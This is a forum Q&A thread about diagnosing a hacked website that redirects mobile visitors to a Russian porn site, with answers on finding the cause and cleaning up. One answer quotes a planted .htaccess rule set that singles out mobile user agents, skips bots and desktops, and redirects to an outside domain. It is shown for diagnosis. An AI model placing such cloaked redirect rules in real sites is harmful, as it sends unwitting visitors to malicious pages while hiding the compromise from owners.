My website is redirecting to a porn site on mobile browsers, where to look?
Solution 1
Please locate and investigate your ./htaccess files. In my case, the hack looked like the following.
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
----I deleted several more lines here
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
RewriteRule ^(.*)$ http://sswim.ru [L,R=302]
# Use PHP5.3 Single php.ini as default
AddHandler application/x-httpd-php54s .php
NOTE THE REWRITE RULE redirecting to sswin.ru!!!
And I'm sure this is just the start of the mess.
Solution 2
Google Webmaster Central has a help site that's a good starting point if your site has been hacked or has malware.
Solution 3
As Gurken said, try to find out if there is any malicious JS being injected into the page. Are you using any ads on the site? If so, the ad provider might be serving different content for mobile & desktop, and have some problem content in the mobile ads served.
Solution 4
Successful attackers often inject some JavaScript into all pages found on the server and this code perhaps checks your user agent. So you might locate it even by simply looking at the source code in your web browser. There could also be some server side code involved, which serves mobile browsers with special (additional) code. Especially if you have separate pages for mobile browsers, this might cause the different effect. Check the code served to mobile browsers by spoofing the user agent of a mobile browser in your desktop browser. In Firefox you could set the value of general.useragent.override to
Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B)
AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile
Safari/535.19
in about:config to spoof an Android browser. Disable JavaScript in Firefox to prevent execution of the suspected script. If there is still no suspicious JavaScript code in the source, the redirect is likely caused by some server side run code or configuration. In this case, check for .htaccess files (if you are using Apache) and for executable scripts like *.php. If you are using server side scripts yourself, check their integrity.
In either case you need to find out, how your site was compromised. Often this is done by exploiting known vulnerabilites in common web applications (eg. forums, CMS, ...). Make sure, you are have patched all known vulnerabilities by installing a sufficiently recent version. Passwords stolen from a compromised user's desktop system are also a common problem. You also must make sure, that you reliably revert your site to a known good state. There might be more changes that those, you already know. Restoring from a clean backup is the best solution, if you cannot confirm the integrity of all of you files on the server.
Related videos on Youtube
01 : 36
02 : 51 : 12
03 : 57
01 : 47
01 : 11
Rahul
Updated on September 18, 2022Comments
-
Rahul almost 2 years
A site that I own is redirecting to a Russian porn site on all mobile browsers (Opera, Android Default, Nokia Default) etc. but not when accessed from a non-mobile platform.
Any idea what the problem might be? Where to look?
-
Moab about 12 yearsSounds like someone hacked your website and are trying to install malware on mobile devices that visit your website.
-
-
Gurken Papst about 12 yearsAds (or any other remotely included scripts) are indeed a likely cause, if there are no obvious changes in your code.
